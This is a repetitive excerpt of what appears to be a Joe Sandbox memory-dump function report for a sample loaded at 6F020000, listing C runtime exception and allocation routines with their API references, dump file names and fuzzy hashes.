                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04DDF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F04DE18
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F04DE2D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 91632da1e72f90e3e39970617f5b18bdf67b16d6b24809667cff7b4a633419d9
                                                                                                          • Instruction ID: a745139097da886710f6699044fc440a72e8173064611cc6e9aaaf1f7a795f11
                                                                                                          • Opcode Fuzzy Hash: 91632da1e72f90e3e39970617f5b18bdf67b16d6b24809667cff7b4a633419d9
                                                                                                          • Instruction Fuzzy Hash: 3F014BB5900708AFC718DF59D440A87BBF9BF58350B00C2AED8599B365EB30EA04CFA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F045C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F045C48
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F045C5D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 9dcf25c08ee72908ec2f97cd23a649cb73c5a78c9a34d8bfc61b06c01aacb63a
                                                                                                          • Instruction ID: 5ffc01cacc7b429f4020d05ff95c8053c8208977455b5e16c1217ec713834aee
                                                                                                          • Opcode Fuzzy Hash: 9dcf25c08ee72908ec2f97cd23a649cb73c5a78c9a34d8bfc61b06c01aacb63a
                                                                                                          • Instruction Fuzzy Hash: 0E014FB59007049FC718DF59D540A8ABBF4AF48310B40C2AED8598B365EB30EA04CBD1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F039B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F039BB8
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F039BCD
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 0cf1e440ae86e1a04c79610c6f3b1d11e7c4473e45e6ec935243f78da981017b
                                                                                                          • Instruction ID: 526422299d6a177d7cca5e0c26a1c8f17590f3c56518efe187bf5b274af18b91
                                                                                                          • Opcode Fuzzy Hash: 0cf1e440ae86e1a04c79610c6f3b1d11e7c4473e45e6ec935243f78da981017b
                                                                                                          • Instruction Fuzzy Hash: 98014FB59047089FC718DF59D540E86BBF4EF48350B00C6AED8599B765EB30EA04CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F08BFB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F08ABC3: __getptd.LIBCMT ref: 6F08ABC9
                                                                                                            • Part of subcall function 6F08ABC3: __getptd.LIBCMT ref: 6F08ABD9
                                                                                                          • __getptd.LIBCMT ref: 6F08BFC3
                                                                                                            • Part of subcall function 6F08EAE6: __getptd_noexit.LIBCMT ref: 6F08EAE9
                                                                                                            • Part of subcall function 6F08EAE6: __amsg_exit.LIBCMT ref: 6F08EAF6
                                                                                                          • __getptd.LIBCMT ref: 6F08BFD1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 803148776-1018135373
                                                                                                          • Opcode ID: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
                                                                                                          • Instruction ID: ade656ae1e72d9df4215adf24fae829bd21e0ff7e60c481b2061309ba71b165b
                                                                                                          • Opcode Fuzzy Hash: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
                                                                                                          • Instruction Fuzzy Hash: 4D016934800305DFDF268FA1D844BADB7F5BF08351F608A2EE0B19A6A0DB30A980CF41
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F034B70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F034B98
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F034BAD
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: f73e148348189bc5e0546a5428c6b474930f091353e5a11eb15796f6de4c2a4c
                                                                                                          • Instruction ID: 33a1e567a4a5e4e31cbd0c919a2d2eb5b2a15616b4fa9732cbf1d46eb76d00c3
                                                                                                          • Opcode Fuzzy Hash: f73e148348189bc5e0546a5428c6b474930f091353e5a11eb15796f6de4c2a4c
                                                                                                          • Instruction Fuzzy Hash: 18011D75904709AFC718DF59D441A86BBF8EF44350B00C1AAD9599B365EB31E904CBD1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F034A30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F034A58
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F034A6D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: c2fc36953bdbcaedd403f4fce877bf2e10ba705a1775a6c83acd5d07a9aa5195
                                                                                                          • Instruction ID: 595360fc92a9c8b6a6731bfa6e969efd53d8a0041d3081981694ba644c36e892
                                                                                                          • Opcode Fuzzy Hash: c2fc36953bdbcaedd403f4fce877bf2e10ba705a1775a6c83acd5d07a9aa5195
                                                                                                          • Instruction Fuzzy Hash: D0018176900708AFC718DF99D440A87BBF8BF44350B10C1AED8198B364EB31EA00CB94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F036970 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F036998
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F0369AD
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 91189bf309984525907b57bd0ccee4084c5bddce3e466290fb41ffab78c0f487
                                                                                                          • Instruction ID: ee56c5610ba84247526ef6c39fe4b8135d9f2b0a455b75b1f8b09a7525387898
                                                                                                          • Opcode Fuzzy Hash: 91189bf309984525907b57bd0ccee4084c5bddce3e466290fb41ffab78c0f487
                                                                                                          • Instruction Fuzzy Hash: 29016D75904708AFCB14DF59D440E86B7F8EF45350B00C2AAD8198B364EB30EA00CF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F054270 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F054298
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F0542AD
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 34ee2427a1a3bb8b629e45ac083bec8db87ad3415c7ff30aa915cd42b5fdacf3
                                                                                                          • Instruction ID: 0d14584e8c1985ed75e9d704bb418f3297baf753c000f0de24553b19b493afcc
                                                                                                          • Opcode Fuzzy Hash: 34ee2427a1a3bb8b629e45ac083bec8db87ad3415c7ff30aa915cd42b5fdacf3
                                                                                                          • Instruction Fuzzy Hash: AB018175900708AFC718DF59D440A86B7F8FF44350B40C1AED8198B364EB71E910CFA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F034C10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F034C38
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F034C4D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: f046d94aadeb51385b016fc05a736659336372f940a9aa0af27f30abaacd33de
                                                                                                          • Instruction ID: 7d728df69f6386bb381d4ac3c75fe5f3ff9a0fe6439c3b6ad1d432c117cd8d78
                                                                                                          • Opcode Fuzzy Hash: f046d94aadeb51385b016fc05a736659336372f940a9aa0af27f30abaacd33de
                                                                                                          • Instruction Fuzzy Hash: 91F04F76914308AFCB04DF99D441A8ABBF8AF45350B40C1AED9199B264EB31F900CF91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F036A40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F036A68
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F036A7D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 39b99f9c6cb7aadbb03a4b76df6796d342d21fc04c483f76867dcc34ee48070d
                                                                                                          • Instruction ID: 344c10d12ee28627d9fb57a11b8ff2789d40205faf206c1473702887f594980a
                                                                                                          • Opcode Fuzzy Hash: 39b99f9c6cb7aadbb03a4b76df6796d342d21fc04c483f76867dcc34ee48070d
                                                                                                          • Instruction Fuzzy Hash: 8FF04F76904708AFCB04DF59D441E8ABBF8AF45350B00C16AD8199B654EB31EA00CFD5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F034AD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F034AF8
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F034B0D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
